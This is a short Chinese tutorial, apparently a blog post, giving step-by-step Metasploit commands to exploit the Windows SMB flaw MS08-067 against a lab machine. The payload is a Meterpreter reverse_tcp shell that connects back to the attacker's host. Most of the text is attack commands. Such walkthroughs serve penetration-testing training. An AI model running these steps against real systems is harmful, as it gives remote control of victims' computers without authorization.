kali-matasploit

 
 

 

1、进入msf终端后,使用search功能搜索ms08-067,发现有一个可用模块:

>msf > search ms08-067

2、使用use命令选定要利用的模块:
msf > use exploit/windows/smb/ms08_067_netapi

3、设置攻击载荷为基于Windows系统的Meterpreter reverse_tcp 

 set PAYLOAD windows/meterpreter/reverse_tcp

4、使用“show targets”命令让我们识别和匹配目标操作系统的类型。

msf exploit(ms08_067_netapi) > show targets 

E 5、选定系统编号(TARTGET),设置靶机IP(RHOST)与本机IP(LHOST) msf exploit(ms08_067_netapi) > set TARGET 17 TARGET => 17 msf exploit(ms08_067_netapi) > set RHOST 192.168.116.129 RHOST => 192.168.116.129 msf exploit(ms08_067_netapi) > set LHOST 192.168.116.128 LHOST => 192.168.116.128

6、使用“show options”命令查看当前参数设置情况:
msf exploit(ms08_067_netapi) >  show option
 
 
 7、参数检查无误后,输入“exploit”对靶机进行攻击。当返回meterpreter提示符表示利用成功。
msf exploit(ms08_067_netapi) > run

你可能感兴趣的:(kali-matasploit)